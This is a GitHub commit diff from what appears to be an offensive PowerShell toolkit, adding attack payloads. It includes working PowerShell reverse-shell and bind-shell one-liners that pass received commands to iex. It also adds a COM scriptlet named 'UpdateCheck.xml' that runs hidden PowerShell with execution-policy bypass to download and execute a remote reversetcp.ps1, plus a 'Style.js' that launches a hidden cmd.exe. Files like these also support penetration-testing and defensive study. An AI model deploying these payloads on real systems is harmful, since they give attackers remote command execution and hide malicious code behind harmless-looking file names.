Skip to content

Commit c3513c2

Browse files
committed
Removed requires from WebCredentials and Prasadhak
1 parent f89580a commit c3513c2

File tree

9 files changed

+42
-7
lines changed

9 files changed

+42
-7
lines changed

Gather/Get-WebCredentials.ps1

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,3 @@
1-
#Requires -Version 3
2-
31
function Get-WebCredentials
42
{
53
<#

Gather/Show-TargetScreen.ps1

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -21,7 +21,7 @@ The IP address to connect to when using the -Reverse switch.
2121
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.
2222
2323
.EXAMPLE
24-
PS > Show-TargetScreen -Reverse -IPAddress 192.168.2301.1 -Port 443
24+
PS > Show-TargetScreen -Reverse -IPAddress 192.168.230.1 -Port 443
2525
2626
Above shows an example of aa reverse connection. A netcat/powercat listener must be listening on
2727
the given IP and port.

Prasadhak/Invoke-Prasadhak.ps1

Lines changed: 0 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,3 @@
1-
#Requires -Version 3
2-
31
function Invoke-Prasadhak
42
{
53

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,6 @@
1-
#Uncomment and change the hardcoded IP address and port number in the below line. Remove this help comment as well.
1+
#A simple and small reverse shell. Options and help removed to save space.
2+
#Uncomment and change the hardcoded IP address and port number in the below line. Remove all help comments as well.
23
#$client = New-Object System.Net.Sockets.TCPClient("192.168.254.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
34

4-
#Even smaller reverse shell. Could fit in Two Tweets.
5+
#Even smaller reverse shell. Could fit in Two Tweets.Don't use with the above reverse shell.
56
#$sm=(New-Object Net.Sockets.TCPClient("192.168.254.1",55555)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
#Uncomment and change the hardcoded port number (443) in the below line. Remove this help comment as well.
2+
#$listener = [System.Net.Sockets.TcpListener]443;$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()

Shortcut to File Server.lnk

1.34 KB
Binary file not shown.

Style.js

Lines changed: 2 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,2 @@
1+
c = "cmd.exe";
2+
r = new ActiveXObject("WScript.Shell").Run(c,0,true);

UpdateCheck.xml

Lines changed: 34 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,34 @@
1+
<?XML version="1.0"?>
2+
<scriptlet>
3+
<registration
4+
progid="PoC"
5+
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
6+
<!-- Proof Of Concept - Casey Smith @subTee -->
7+
<!-- License: BSD3-Clause -->
8+
9+
<script language="JScript">
10+
<![CDATA[
11+
12+
ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
13+
c = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.36/reversetcp.ps1'));";
14+
r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
15+
16+
]]>
17+
</script>
18+
</registration>
19+
20+
<public>
21+
<method name="Exec"></method>
22+
</public>
23+
<script language="JScript">
24+
<![CDATA[
25+
26+
function Exec()
27+
{
28+
ps = 'powershell.exe -w h -nologo -noprofile -ep bypass ';
29+
c = "IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.36/reversetcp.ps1'));";
30+
r = new ActiveXObject("WScript.Shell").Run(ps + c,0,true);
31+
}
32+
]]>
33+
</script>
34+
</scriptlet>

WindDef_WebInstall.hta

1.69 KB
Binary file not shown.

0 commit comments

Comments
 (0)